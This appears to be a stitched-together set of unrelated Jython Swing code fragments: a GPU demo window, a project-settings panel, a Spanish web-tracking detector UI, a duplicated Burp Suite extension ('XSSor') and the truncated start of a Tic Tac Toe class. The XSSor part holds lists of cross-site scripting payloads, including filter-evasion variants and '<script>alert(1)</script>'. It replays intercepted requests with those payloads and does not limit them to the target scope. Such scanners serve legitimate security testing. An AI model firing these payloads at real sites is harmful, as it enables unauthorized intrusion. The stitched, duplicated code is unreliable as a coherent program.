    def add_button(caption, handler, x, width, tip):
        # Create a button on the bottom row and add it to the panel.
        button = JButton(caption, actionPerformed=handler)
        button.setBounds(x, 500, width, 30)
        button.setToolTipText(tip)
        self.panel.add(button)

    add_button("JOCL", self.onJocl, 100, 100, "JOCL Button")
    add_button("Java", self.onJava, 100, 100, "Java Button")
    add_button("Quit", self.onQuit, 200, 80, "Quit Button")

    # NOTE(review): ImageIO.read yields no image when the file cannot be
    # decoded, in which case the scaling call below would fail - confirm the
    # file is always present.
    source_image = ImageIO.read(io.File("input.png"))
    scaled = source_image.getScaledInstance(600, 600, 10)
    image_label = JLabel("Input Image", ImageIcon(scaled), JLabel.CENTER)
    image_label.setVerticalTextPosition(JLabel.TOP)
    image_label.setHorizontalTextPosition(JLabel.RIGHT)
    image_label.setSize(10, 10)
    image_label.setBackground(Color.orange)
    self.panel.add(image_label)

    self.getContentPane().add(self.panel)

    self.clockLabel = JLabel()
    self.clockLabel.setSize(1, 1)
    self.clockLabel.setBackground(Color.orange)
    self.clockLabel.setVerticalTextPosition(JLabel.BOTTOM)
    self.clockLabel.setHorizontalTextPosition(JLabel.LEFT)
    self.clockLabel.setFont(Font("Serif", Font.PLAIN, 50))
    self.panel.add(self.clockLabel)

    self.setTitle("GPU Demo")
    self.setSize(1200, 600)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)
    self.setVisible(True)
def initProjSettingsTab(self):
    """Build the project-settings panel and store it as ``self.projectSettings``.

    Creates the name / path / details inputs, the report-type selector, the
    project selector (filled from the 'projects' section of ``self.config``)
    and the action buttons, then selects the configured default project if
    the 'general' section names one.
    """
    def place(widget, x, y, width, height):
        # Absolute positioning helper; returns the widget for chaining.
        widget.setBounds(x, y, width, height)
        return widget

    # Name
    projNameLabel = place(JLabel("Name:"), 10, 50, 140, 30)
    self.projName = place(JTextField(""), 140, 50, 320, 30)
    self.projName.getDocument().addDocumentListener(projTextChanged(self))

    detailsLabel = place(JLabel("Details:"), 10, 120, 140, 30)

    # Report generation
    reportLabel = place(JLabel("Generate Report:"), 10, 375, 140, 30)
    self.reportType = place(JComboBox(["DOCX", "HTML", "XLSX"]), 10, 400, 140, 30)
    generateReportButton = place(
        JButton("Generate", actionPerformed=self.generateReport), 160, 400, 90, 30)

    # Details text area inside a scroll pane
    self.projDetails = JTextArea("", 5, 30)
    self.projDetails.setWrapStyleWord(True)
    self.projDetails.setLineWrap(True)
    projDetailsScroll = place(JScrollPane(self.projDetails), 10, 150, 450, 175)
    projDetailsScroll.setVerticalScrollBarPolicy(
        ScrollPaneConstants.VERTICAL_SCROLLBAR_AS_NEEDED)

    # Path
    projPathLabel = place(JLabel("Path:"), 10, 90, 140, 30)
    self.projPath = place(JTextField(""), 140, 90, 320, 30)
    chooseProjPathButton = place(
        JButton("Browse...", actionPerformed=self.chooseProjPath), 470, 90, 100, 30)

    # Top-row actions
    importProjButton = place(
        JButton("Import", actionPerformed=self.importProj), 470, 10, 100, 30)
    exportProjButton = place(
        JButton("Export", actionPerformed=self.exportProj), 575, 10, 100, 30)
    openProjButton = place(
        JButton("Open Directory", actionPerformed=self.openProj), 680, 10, 130, 30)

    # Project selector. The change handler is attached before the default
    # project is selected further down, so that selection reaches the handler.
    currentProjectLabel = place(JLabel("Current:"), 10, 10, 140, 30)
    self.currentProject = JComboBox(self.config.options('projects'))
    self.currentProject.addActionListener(projectChangeHandler(self))
    self.currentProject.setBounds(140, 10, 140, 30)

    self.autoSave = JCheckBox("Auto Save Mode")
    self.autoSave.setEnabled(False)  # implement this feature
    self.autoSave.setBounds(300, 10, 140, 30)
    self.autoSave.setToolTipText("Will save any changed value while focus is out")

    addProjButton = place(
        JButton("Add / Update", actionPerformed=self.addProj), 10, 330, 150, 30)
    removeProjButton = place(
        JButton("Remove Current", actionPerformed=self.rmProj), 315, 330, 146, 30)

    # Pre-select the default project and show its stored path.
    if 'default project' in self.config.options('general'):
        defaultProj = self.config.get('general', 'default project')
        self.currentProject.getModel().setSelectedItem(defaultProj)
        self.projPath.setText(
            self.config.get('projects', self.currentProject.getSelectedItem()))

    self.clearProjTab = True

    self.projectSettings = JPanel()
    self.projectSettings.setBounds(0, 0, 1000, 1000)
    self.projectSettings.setLayout(None)
    # Insertion order kept exactly as before.
    for widget in (reportLabel, detailsLabel, projPathLabel, addProjButton,
                   openProjButton, projNameLabel, projDetailsScroll,
                   importProjButton, exportProjButton, removeProjButton,
                   generateReportButton, chooseProjPathButton,
                   currentProjectLabel, self.projPath, self.autoSave,
                   self.projName, self.reportType, self.currentProject):
        self.projectSettings.add(widget)
def initUI(self):
    """Build and show the main window of the tracking-detection tool.

    A 6x3 grid holds the URL field, two cookie check boxes, a text area for
    URLs loaded from a file, a file-chooser button (``self.open``) and the
    run button (``self.ejecutar``); the remaining cells are blank spacers.
    """
    def spacer():
        # Blank label that fills one grid cell.
        return JLabel(' ')

    self.panel = JPanel()
    self.panel.setLayout(GridLayout(6, 3))
    self.panel.setBorder(BorderFactory.createEmptyBorder(10, 10, 10, 10))

    url_caption = JLabel(' Introduzca las URL que desee analizar:')
    # NOTE(review): the two check boxes are only held in local variables, so
    # their state is not reachable through self afterwards - confirm how the
    # handlers read them.
    sync_checkbox = JCheckBox('Sincronizacion de cookies')
    self.textfieldURL = JTextField(15)
    restore_checkbox = JCheckBox('Restauracion de cookies')
    file_caption = JLabel(' O seleccione un fichero que las contenga:')

    self.area = JTextArea()
    scroll = JScrollPane()
    scroll.getViewport().add(self.area)

    # The file button sits in its own null-layout panel so that it keeps a
    # fixed size instead of filling the grid cell.
    file_panel = JPanel()
    file_panel.setLayout(None)
    file_button = JButton("Seleccionar fichero", actionPerformed=self.open)
    file_button.setBounds(10, 0, 200, 25)
    file_panel.add(file_button)

    run_button = JButton("Ejecutar", actionPerformed=self.ejecutar)
    run_button.setFont(Font("Tahoma", Font.BOLD, 24))

    # Cells in row-major order, three per row.
    cells = [
        url_caption, spacer(), sync_checkbox,
        self.textfieldURL, spacer(), restore_checkbox,
        file_caption, spacer(), spacer(),
        scroll, file_panel, spacer(),
        spacer(), spacer(), spacer(),
        spacer(), run_button, spacer(),
    ]
    for cell in cells:
        self.panel.add(cell)

    self.add(self.panel)

    self.setTitle(
        "HERRAMIENTA PARA LA DETECCION DE TECNICAS DE SEGUIMIENTO DE USUARIOS EN LA WEB"
    )
    self.setSize(1000, 450)
    self.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE)
    self.setLocationRelativeTo(None)
    self.setVisible(True)
def registerExtenderCallbacks(self, callbacks):
    """Burp entry point: define the probe lists, build the UI, register hooks.

    Stores the callbacks/helpers objects, creates the log table, the
    request/response viewers, the "Affected Pages" and "Configuration"
    tabs, then registers this object as suite tab, HTTP listener and
    context-menu factory. The extension starts switched off
    (self.intercept == 0).
    """
    # Author's to-do list: smart xss feature (print conclusion and
    # observation), mark results, automatically check pages in the same domain.

    # Probes for HTML element context.
    self.tagPayloads = [
        "<b>test",
        "<b onmouseover=test()>test",
        "<img src=err onerror=test()>",
        # NOTE(review): two adjacent literals concatenate into one string;
        # a comma may be missing between them.
        "<script>test</script>" "",
        "<scr ipt>test</scr ipt>",
        "<SCRIPT>test;</SCRIPT>",
        "<scri<script>pt>test;</scr</script>ipt>",
        "<SCRI<script>PT>test;</SCR</script>IPT>",
        "<scri<scr<script>ipt>pt>test;</scr</sc</script>ript>ipt>",
        "<IMG \"\"\"><SCRIPT>test</SCRIPT>\">",
        "<IMG '''><SCRIPT>test</SCRIPT>'>",
        "<SCR%00IPT>test</SCR%00IPT>",
        "<IFRAME SRC='f' onerror=\"test\"></IFRAME>",
        "<IFRAME SRC='f' onerror='test'></IFRAME>",
        "<<SCRIPT>test//<</SCRIPT>",
        "<img src=\"1\" onerror=\"test\">",
        "<img src='1' onerror='test'",
        "<STYLE TYPE=\"text/javascript\">test;</STYLE>",
        "<<SCRIPT>test//<</SCRIPT>",
    ]
    # Probes for HTML attribute / inline script context.
    self.attributePayloads = [
        "\"\"\"><SCRIPT>test",
        "'''><SCRIPT>test'",
        "\"><script>test</script>",
        "\"><script>test</script><\"",
        "'><script>test</script>",
        "'><script>test</script><'",
        "\";test;\"",
        "';test;'",
        ";test;",
        "\";test;//",
        "\"onmouseover=test ",
        "onerror=\"test\"",
        "onerror='test'",
        "onload=\"test\"",
        "onload='test'",
    ]
    # Marker the tester places in a request to select the injection point.
    self.xssKey = 'xssme'

    # Burp handles used by the other methods.
    self._callbacks = callbacks
    self._helpers = callbacks.getHelpers()
    callbacks.setExtensionName("XSSor")

    # Shared state: pages to re-check, result log and the lock guarding it.
    self.affectedResponses = ArrayList()
    self._log = ArrayList()
    self._lock = Lock()

    # Left side of the split pane: table of results.
    self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)
    log_table = Table(self)
    log_scroll = JScrollPane(log_table)
    self._splitpane.setLeftComponent(log_scroll)

    # Right side: tabs, starting with read-only request/response viewers.
    main_tabs = JTabbedPane()
    self._requestViewer = callbacks.createMessageEditor(self, False)
    self._responseViewer = callbacks.createMessageEditor(self, False)
    main_tabs.addTab("Request", self._requestViewer.getComponent())
    main_tabs.addTab("Response", self._responseViewer.getComponent())

    # --- "Affected Pages" tab -------------------------------------------
    clear_button = JButton("Clear List", actionPerformed=self.clearAPList)
    clear_button.setBounds(10, 85, 120, 30)
    list_label = JLabel('Affected Pages List:')
    list_label.setBounds(10, 10, 140, 30)

    self.affectedModel = DefaultListModel()
    self.affectedList = JList(self.affectedModel)
    self.affectedList.addListSelectionListener(listSelectedChange(self))
    affected_scroll = JScrollPane(self.affectedList)
    affected_scroll.setVerticalScrollBarPolicy(
        JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
    affected_scroll.setBounds(150, 10, 550, 200)
    affected_scroll.setBorder(LineBorder(Color.BLACK))

    affected_tabs = JTabbedPane()
    self._requestAPViewer = callbacks.createMessageEditor(self, False)
    self._responseAPViewer = callbacks.createMessageEditor(self, False)
    affected_tabs.addTab("Request", self._requestAPViewer.getComponent())
    affected_tabs.addTab("Affeced Page Response",
                         self._responseAPViewer.getComponent())
    affected_tabs.setBounds(0, 250, 700, 350)
    affected_tabs.setSelectedIndex(1)

    self.APpnl = JPanel()
    self.APpnl.setBounds(0, 0, 1000, 1000)
    self.APpnl.setLayout(None)
    for widget in (affected_scroll, clear_button, affected_tabs, list_label):
        self.APpnl.add(widget)
    main_tabs.addTab("Affected Pages", self.APpnl)

    # Extension is off until the start button is pressed.
    self.intercept = 0

    # --- "Configuration" tab --------------------------------------------
    status_label = JLabel("Plugin status:")
    status_label.setBounds(10, 10, 140, 30)
    basic_label = JLabel("Basic Payload:")
    basic_label.setBounds(10, 50, 140, 30)

    self.basicPayload = "<script>alert(1)</script>"
    self.basicPayloadTxt = JTextArea(self.basicPayload, 5, 30)
    self.basicPayloadTxt.setBounds(120, 50, 305, 30)

    self.bruteForceMode = JCheckBox("Brute Force Mode")
    self.bruteForceMode.setBounds(120, 80, 300, 30)
    self.bruteForceMode.addItemListener(handleBFModeChange(self))

    # Both list selectors start ticked and disabled.
    self.tagPayloadsCheck = JCheckBox("Tag paylods")
    self.tagPayloadsCheck.setBounds(120, 100, 300, 30)
    self.tagPayloadsCheck.setSelected(True)
    self.tagPayloadsCheck.setEnabled(False)
    self.tagPayloadsCheck.addItemListener(handleBFModeList(self))

    self.attributePayloadsCheck = JCheckBox("Attribute payloads")
    self.attributePayloadsCheck.setBounds(260, 100, 300, 30)
    self.attributePayloadsCheck.setSelected(True)
    self.attributePayloadsCheck.setEnabled(False)
    self.attributePayloadsCheck.addItemListener(handleBFModeList(self))

    bf_list_label = JLabel("Payloads list (for BF mode):")
    bf_list_label.setBounds(10, 130, 140, 30)
    self.payloadsModel = DefaultListModel()
    self.payloadsList = JList(self.payloadsModel)
    bf_scroll = JScrollPane(self.payloadsList)
    bf_scroll.setVerticalScrollBarPolicy(
        JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
    bf_scroll.setBounds(120, 170, 300, 200)
    bf_scroll.setBorder(LineBorder(Color.BLACK))
    # Author's to-do: add buttons to remove payloads and add.
    for entry in self.tagPayloads + self.attributePayloads:
        self.payloadsModel.addElement(entry)

    self.startButton = JButton("XSSor is off",
                               actionPerformed=self.startOrStop)
    self.startButton.setBounds(120, 10, 120, 30)
    self.startButton.setBackground(Color(255, 100, 91, 255))

    console_tabs = JTabbedPane()
    self.consoleLog = JTextArea("", 5, 30)
    console_scroll = JScrollPane(self.consoleLog)
    console_scroll.setVerticalScrollBarPolicy(
        JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
    console_scroll.setBounds(120, 170, 550, 200)
    console_scroll.setBorder(LineBorder(Color.BLACK))
    console_scroll.getVerticalScrollBar().addAdjustmentListener(
        autoScrollListener(self))
    console_tabs.addTab("Console", console_scroll)
    console_tabs.setBounds(0, 400, 500, 200)

    self.pnl = JPanel()
    self.pnl.setBounds(0, 0, 1000, 1000)
    self.pnl.setLayout(None)
    for widget in (self.startButton, status_label, basic_label,
                   self.basicPayloadTxt, self.bruteForceMode, bf_list_label,
                   bf_scroll, self.attributePayloadsCheck,
                   self.tagPayloadsCheck, console_tabs):
        self.pnl.add(widget)
    main_tabs.addTab("Configuration", self.pnl)
    # Index 3 is the "Configuration" tab added just above.
    main_tabs.setSelectedIndex(3)
    self._splitpane.setRightComponent(main_tabs)

    # Let Burp apply its look and feel to our components.
    for component in (self._splitpane, log_table, log_scroll, main_tabs):
        callbacks.customizeUiComponent(component)

    # Hook the extension into Burp.
    callbacks.addSuiteTab(self)
    callbacks.registerHttpListener(self)
    self._callbacks.registerContextMenuFactory(self)

    print("Thank you for installing XSSor v0.1 extension")
    print("Created by Barak Tawily")
    print("\nGithub:\nhttps://github.com/Quitten/XSSor")
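class BurpExtender(IBurpExtender, ITab, IHttpListener,
                   IMessageEditorController, AbstractTableModel,
                   IContextMenuFactory):
    """Burp extension ("XSSor") that probes for reflected markup.

    When switched on, every proxy response whose request contains the
    marker ``self.xssKey`` triggers one or more replayed requests in which
    the marker is replaced by a probe string. A probe is logged as
    reflected when it appears verbatim in the reply, or in the reply of one
    of the user-selected "affected pages".

    NOTE(review): the replay is an active request and nothing in this class
    limits it to Burp's configured target scope. Gating checkForKey with
    ``callbacks.isInScope(url)`` would keep testing inside the engagement
    scope. A verbatim match only shows unencoded reflection somewhere in
    the raw response (headers included); it does not prove script
    execution, so results need manual confirmation.
    """

    def registerExtenderCallbacks(self, callbacks):
        """Define the probe lists, build the UI and register with Burp."""
        # Author's to-do list: smart xss feature (print conclusion and
        # observation), mark results, automatically check pages in the
        # same domain.

        # Probes for HTML element context.
        self.tagPayloads = [
            "<b>test",
            "<b onmouseover=test()>test",
            "<img src=err onerror=test()>",
            # NOTE(review): two adjacent literals concatenate into one
            # string; a comma may be missing between them.
            "<script>test</script>" "",
            "<scr ipt>test</scr ipt>",
            "<SCRIPT>test;</SCRIPT>",
            "<scri<script>pt>test;</scr</script>ipt>",
            "<SCRI<script>PT>test;</SCR</script>IPT>",
            "<scri<scr<script>ipt>pt>test;</scr</sc</script>ript>ipt>",
            "<IMG \"\"\"><SCRIPT>test</SCRIPT>\">",
            "<IMG '''><SCRIPT>test</SCRIPT>'>",
            "<SCR%00IPT>test</SCR%00IPT>",
            "<IFRAME SRC='f' onerror=\"test\"></IFRAME>",
            "<IFRAME SRC='f' onerror='test'></IFRAME>",
            "<<SCRIPT>test//<</SCRIPT>",
            "<img src=\"1\" onerror=\"test\">",
            "<img src='1' onerror='test'",
            "<STYLE TYPE=\"text/javascript\">test;</STYLE>",
            "<<SCRIPT>test//<</SCRIPT>",
        ]
        # Probes for HTML attribute / inline script context.
        self.attributePayloads = [
            "\"\"\"><SCRIPT>test",
            "'''><SCRIPT>test'",
            "\"><script>test</script>",
            "\"><script>test</script><\"",
            "'><script>test</script>",
            "'><script>test</script><'",
            "\";test;\"",
            "';test;'",
            ";test;",
            "\";test;//",
            "\"onmouseover=test ",
            "onerror=\"test\"",
            "onerror='test'",
            "onload=\"test\"",
            "onload='test'",
        ]
        # Marker the tester places in a request to select the injection point.
        self.xssKey = 'xssme'

        # keep a reference to our callbacks object
        self._callbacks = callbacks
        # obtain an extension helpers object
        self._helpers = callbacks.getHelpers()
        # set our extension name
        callbacks.setExtensionName("XSSor")

        # Pages to re-check, the result log, and the lock guarding the log.
        self.affectedResponses = ArrayList()
        self._log = ArrayList()
        self._lock = Lock()

        # main split pane
        self._splitpane = JSplitPane(JSplitPane.HORIZONTAL_SPLIT)

        # table of log entries
        logTable = Table(self)
        scrollPane = JScrollPane(logTable)
        self._splitpane.setLeftComponent(scrollPane)

        # tabs with read-only request/response viewers
        tabs = JTabbedPane()
        self._requestViewer = callbacks.createMessageEditor(self, False)
        self._responseViewer = callbacks.createMessageEditor(self, False)
        tabs.addTab("Request", self._requestViewer.getComponent())
        tabs.addTab("Response", self._responseViewer.getComponent())

        # "Affected Pages" tab
        clearAPListBtn = JButton("Clear List",
                                 actionPerformed=self.clearAPList)
        clearAPListBtn.setBounds(10, 85, 120, 30)
        apListLabel = JLabel('Affected Pages List:')
        apListLabel.setBounds(10, 10, 140, 30)

        self.affectedModel = DefaultListModel()
        self.affectedList = JList(self.affectedModel)
        self.affectedList.addListSelectionListener(listSelectedChange(self))
        scrollAList = JScrollPane(self.affectedList)
        scrollAList.setVerticalScrollBarPolicy(
            JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
        scrollAList.setBounds(150, 10, 550, 200)
        scrollAList.setBorder(LineBorder(Color.BLACK))

        APtabs = JTabbedPane()
        self._requestAPViewer = callbacks.createMessageEditor(self, False)
        self._responseAPViewer = callbacks.createMessageEditor(self, False)
        APtabs.addTab("Request", self._requestAPViewer.getComponent())
        APtabs.addTab("Affeced Page Response",
                      self._responseAPViewer.getComponent())
        APtabs.setBounds(0, 250, 700, 350)
        APtabs.setSelectedIndex(1)

        self.APpnl = JPanel()
        self.APpnl.setBounds(0, 0, 1000, 1000)
        self.APpnl.setLayout(None)
        self.APpnl.add(scrollAList)
        self.APpnl.add(clearAPListBtn)
        self.APpnl.add(APtabs)
        self.APpnl.add(apListLabel)
        tabs.addTab("Affected Pages", self.APpnl)

        # The extension stays passive until the start button is pressed.
        self.intercept = 0

        # "Configuration" tab
        startLabel = JLabel("Plugin status:")
        startLabel.setBounds(10, 10, 140, 30)

        payloadLabel = JLabel("Basic Payload:")
        payloadLabel.setBounds(10, 50, 140, 30)

        self.basicPayload = "<script>alert(1)</script>"
        self.basicPayloadTxt = JTextArea(self.basicPayload, 5, 30)
        self.basicPayloadTxt.setBounds(120, 50, 305, 30)

        self.bruteForceMode = JCheckBox("Brute Force Mode")
        self.bruteForceMode.setBounds(120, 80, 300, 30)
        self.bruteForceMode.addItemListener(handleBFModeChange(self))

        # Both list selectors start ticked and disabled.
        self.tagPayloadsCheck = JCheckBox("Tag paylods")
        self.tagPayloadsCheck.setBounds(120, 100, 300, 30)
        self.tagPayloadsCheck.setSelected(True)
        self.tagPayloadsCheck.setEnabled(False)
        self.tagPayloadsCheck.addItemListener(handleBFModeList(self))

        self.attributePayloadsCheck = JCheckBox("Attribute payloads")
        self.attributePayloadsCheck.setBounds(260, 100, 300, 30)
        self.attributePayloadsCheck.setSelected(True)
        self.attributePayloadsCheck.setEnabled(False)
        self.attributePayloadsCheck.addItemListener(handleBFModeList(self))

        payloadListLabel = JLabel("Payloads list (for BF mode):")
        payloadListLabel.setBounds(10, 130, 140, 30)
        self.payloadsModel = DefaultListModel()
        self.payloadsList = JList(self.payloadsModel)
        scrollPayloadsList = JScrollPane(self.payloadsList)
        scrollPayloadsList.setVerticalScrollBarPolicy(
            JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
        scrollPayloadsList.setBounds(120, 170, 300, 200)
        scrollPayloadsList.setBorder(LineBorder(Color.BLACK))
        # Author's to-do: add buttons to remove payloads and add.

        for payload in self.tagPayloads:
            self.payloadsModel.addElement(payload)
        for payload in self.attributePayloads:
            self.payloadsModel.addElement(payload)

        self.startButton = JButton("XSSor is off",
                                   actionPerformed=self.startOrStop)
        self.startButton.setBounds(120, 10, 120, 30)
        self.startButton.setBackground(Color(255, 100, 91, 255))

        consoleTab = JTabbedPane()
        self.consoleLog = JTextArea("", 5, 30)
        scrollLog = JScrollPane(self.consoleLog)
        scrollLog.setVerticalScrollBarPolicy(
            JScrollPane.VERTICAL_SCROLLBAR_AS_NEEDED)
        scrollLog.setBounds(120, 170, 550, 200)
        scrollLog.setBorder(LineBorder(Color.BLACK))
        scrollLog.getVerticalScrollBar().addAdjustmentListener(
            autoScrollListener(self))
        consoleTab.addTab("Console", scrollLog)
        consoleTab.setBounds(0, 400, 500, 200)

        self.pnl = JPanel()
        self.pnl.setBounds(0, 0, 1000, 1000)
        self.pnl.setLayout(None)
        self.pnl.add(self.startButton)
        self.pnl.add(startLabel)
        self.pnl.add(payloadLabel)
        self.pnl.add(self.basicPayloadTxt)
        self.pnl.add(self.bruteForceMode)
        self.pnl.add(payloadListLabel)
        self.pnl.add(scrollPayloadsList)
        self.pnl.add(self.attributePayloadsCheck)
        self.pnl.add(self.tagPayloadsCheck)
        self.pnl.add(consoleTab)

        tabs.addTab("Configuration", self.pnl)
        # Index 3 is the "Configuration" tab added just above.
        tabs.setSelectedIndex(3)
        self._splitpane.setRightComponent(tabs)

        # customize our UI components
        callbacks.customizeUiComponent(self._splitpane)
        callbacks.customizeUiComponent(logTable)
        callbacks.customizeUiComponent(scrollPane)
        callbacks.customizeUiComponent(tabs)

        # add the custom tab to Burp's UI
        callbacks.addSuiteTab(self)

        # register ourselves as an HTTP listener
        callbacks.registerHttpListener(self)
        self._callbacks.registerContextMenuFactory(self)

        print("Thank you for installing XSSor v0.1 extension")
        print("Created by Barak Tawily")
        print("\nGithub:\nhttps://github.com/Quitten/XSSor")

    #
    # implement ITab
    #

    def getTabCaption(self):
        """Return the caption of the extension's suite tab."""
        return "XSSor"

    def getUiComponent(self):
        """Return the root component shown inside the suite tab."""
        return self._splitpane

    #
    # implement IHttpListener
    #

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        """Inspect proxy traffic for the marker while the extension is on.

        Only messages with tool flag 4 (Burp's proxy tool) are considered,
        and only once the response has arrived, so the original exchange
        is complete before any replay is sent.
        """
        if self.intercept != 1:
            return
        if toolFlag == 4 and not messageIsRequest:
            self.checkForKey(messageInfo)

    def printLog(self, message):
        """Append *message* as a new line to the console text area."""
        # NOTE(review): this is called from Burp's HTTP listener path, which
        # is presumably not the Swing event thread - confirm whether the
        # update should go through SwingUtilities.invokeLater.
        self.consoleLog.setText(self.consoleLog.getText() + '\r\n' + message)

    def checkXSS(self, messageInfo, urlStr, requestBody, currentPayload):
        """Replay one request with the marker replaced and log the result.

        Parameters:
            messageInfo: the proxied message that contained the marker
                (not used here beyond the values derived by the caller).
            urlStr: URL of the original request as a string.
            requestBody: the full raw request text (request line, headers
                and body) with the Referer header already removed.
            currentPayload: probe string that replaces the marker.

        The result row says 'yes' when the probe is echoed verbatim in the
        direct reply, 'yes, affected page' when it shows up in one of the
        re-requested affected pages, and 'no' otherwise.
        """
        self.printLog('trying exploit with the payload: ' + currentPayload)
        # The URL is only used to derive host, port and protocol.
        requestURL = URL(urlStr.replace(self.xssKey, currentPayload))
        # NOTE(review): Content-Length is not recomputed after the
        # substitution, so a marker inside a request body may produce a
        # truncated or over-long body - verify against a POST request.
        requestBody = requestBody.replace(
            self.xssKey, urllib.pathname2url(currentPayload))
        httpService = self._helpers.buildHttpService(
            str(requestURL.getHost()), int(requestURL.getPort()),
            requestURL.getProtocol() == "https")
        response = self._callbacks.makeHttpRequest(httpService, requestBody)
        # The whole raw response (headers and body) is searched.
        responseBody = self._helpers.bytesToString(
            response.getResponse()).encode('utf-8')

        vulnOrNot = 'no'
        if currentPayload in responseBody:
            self.printLog('payload: ' + currentPayload +
                          ' found to be vulnarble')
            vulnOrNot = 'yes'

        # Stored reflection: re-request every affected page and look for
        # the probe there as well.
        for request in self.affectedResponses:
            # Author's note: bug in case of no response in messageinfo.
            self.printLog('checking affeccted page' + str(request.getUrl()))
            requestURL = request.getUrl()
            httpService = self._helpers.buildHttpService(
                str(requestURL.getHost()), int(requestURL.getPort()),
                requestURL.getProtocol() == "https")
            affectedPageResponse = self._callbacks.makeHttpRequest(
                httpService, request.getRequest())
            responseBody = self._helpers.bytesToString(
                affectedPageResponse.getResponse()).encode('utf-8')
            if currentPayload in responseBody:
                vulnOrNot = 'yes, affected page'
                self.printLog('affeccted page has been found as vulnerable')

        # Always release the lock, even if building the log entry fails;
        # otherwise every later check would block forever.
        self._lock.acquire()
        try:
            row = self._log.size()
            self._log.add(
                LogEntry(
                    self._helpers.analyzeRequest(response).getUrl(),
                    self._callbacks.saveBuffersToTempFiles(response),
                    currentPayload, vulnOrNot))
            self.fireTableRowsInserted(row, row)
        finally:
            self._lock.release()

    def checkForKey(self, messageInfo):
        """Run the probes when the marker appears in the URL or raw request.

        In brute-force mode every entry of the payload list model is
        tried; otherwise only the text of the "Basic Payload" field is.
        """
        requestInfo = self._helpers.analyzeRequest(messageInfo)
        urlStr = str(requestInfo.getUrl())
        self.printLog('checking for xss key in URL: ' + urlStr)
        requestBody = self._helpers.bytesToString(messageInfo.getRequest())
        # Drop the first Referer header so a marker that only appears
        # there (from the previous page) does not trigger a check.
        requestBody = re.sub(
            'Referer:.*\n', '', requestBody, flags=re.MULTILINE, count=1)
        if self.xssKey not in urlStr and self.xssKey not in requestBody:
            return
        self.printLog('xss key has been found')
        if self.bruteForceMode.isSelected():
            for i in range(self.payloadsModel.getSize()):
                payload = self.payloadsModel.getElementAt(i)
                self.checkXSS(messageInfo, urlStr, requestBody, payload)
        else:
            self.checkXSS(messageInfo, urlStr, requestBody,
                          self.basicPayloadTxt.getText())

    #
    # extend AbstractTableModel
    #

    def getRowCount(self):
        """Return the number of log rows (0 before the log exists)."""
        try:
            return self._log.size()
        except AttributeError:
            # The table may ask for the row count before
            # registerExtenderCallbacks has created self._log.
            return 0

    def getColumnCount(self):
        """Return the number of table columns."""
        return 3

    def getColumnName(self, columnIndex):
        """Return the header of column *columnIndex*, or "" if unknown."""
        names = ("URL", "Payload", "Vulnerable?")
        if 0 <= columnIndex < len(names):
            return names[columnIndex]
        return ""

    def getValueAt(self, rowIndex, columnIndex):
        """Return the cell value for the given log row and column."""
        logEntry = self._log.get(rowIndex)
        if columnIndex == 0:
            return logEntry._url.toString()
        if columnIndex == 1:
            return logEntry._payload
        if columnIndex == 2:
            return logEntry._vulnOrNot
        return ""

    #
    # implement IMessageEditorController
    # this allows our request/response viewers to obtain details about the
    # messages being displayed
    #
    # NOTE(review): self._currentlyDisplayedItem is not assigned anywhere in
    # this class; presumably the Table helper sets it on row selection.

    def getHttpService(self):
        """Return the HTTP service of the currently displayed item."""
        return self._currentlyDisplayedItem.getHttpService()

    def getRequest(self):
        """Return the request of the currently displayed item."""
        return self._currentlyDisplayedItem.getRequest()

    def getResponse(self):
        """Return the response of the currently displayed item."""
        return self._currentlyDisplayedItem.getResponse()

    def startOrStop(self, event):
        """Toggle the extension on or off from the start button."""
        if self.startButton.getText() == "XSSor is off":
            self.startButton.setText("XSSor is on")
            self.startButton.setBackground(Color.GREEN)
            self.printLog('on, waiting for key word to be found (' +
                          self.xssKey + ')')
            self.intercept = 1
        else:
            self.startButton.setText("XSSor is off")
            self.startButton.setBackground(Color(255, 100, 91, 255))
            self.intercept = 0

    def clearAPList(self, event):
        """Empty the affected-pages list and its backing collection."""
        self.affectedModel.clear()
        self.affectedResponses = ArrayList()

    #
    # implement IContextMenuFactory
    #

    def createMenuItems(self, invocation):
        """Offer "XSSor: Add affected page" for the first selected message.

        Returns None when nothing is selected, which tells Burp that this
        factory contributes no menu items.
        """
        responses = invocation.getSelectedMessages()
        # The selection can be missing or empty; check both before indexing.
        if responses is None or len(responses) == 0:
            return None
        ret = LinkedList()
        affectedMenuItem = JMenuItem("XSSor: Add affected page")
        affectedMenuItem.addActionListener(
            handleMenuItems(self, responses[0], "affected"))
        ret.add(affectedMenuItem)
        return ret

    def addAfectedPage(self, messageInfo):
        """Register *messageInfo* as a page to re-check after each probe."""
        self.affectedModel.addElement(
            str(self._helpers.analyzeRequest(messageInfo).getUrl()))
        self.affectedResponses.add(messageInfo)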
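class TicTacToeGame(WindowAdapter):
    # Tic Tac Toe game with Mario and Dizzy animated icons/music.
    # Computer plays with Mario ('0' on the board) and the player plays
    # with Dizzy ('X' on the board).

    # game title
    game_title = "Tic Tac Toe: You vs Mario"
    # welcome status message.
    welcome_status = "Welcome! Please make your first move."
    # in-game status message.
    in_game_status = "Mario chases You! Hurry up!"
    # board 3x3, ' ' marks an empty cell
    board = [[' ', ' ', ' '], [' ', ' ', ' '], [' ', ' ', ' ']]
    # total number of cells
    size = len(board) * len(board)
    # size of cell
    tile_size = 128
    # status bar height
    status_bar_height = 50
    # status bar top margin
    status_bar_margin_top = -15
    # status bar left margin
    status_bar_margin_left = 10
    # number of cells in a row/column
    cells = 3
    # winner
    winner = None
    # Mario image
    mario = '/MARIO_128x128.gif'
    # Dizzy image (chosen by the player in choosePlayer)
    dizzy = None
    # Blank image; also used as the "winner" value for a tie
    blank = '/BLANK.gif'
    # supported music sounds
    sounds = ['/DIZZY.wav', '/MARIO.wav']
    # currently played sound
    sound = None
    # index of the next background sound to play
    last_sound = 0
    # won sound
    won_sound = '/WON.wav'
    # lose sound
    lose_sound = '/LOSE.wav'
    # tie sound
    tie_sound = '/TIE.wav'
    # action sound
    action_sound = '/ACTION.wav'

    def __init__(self, resources_directory):
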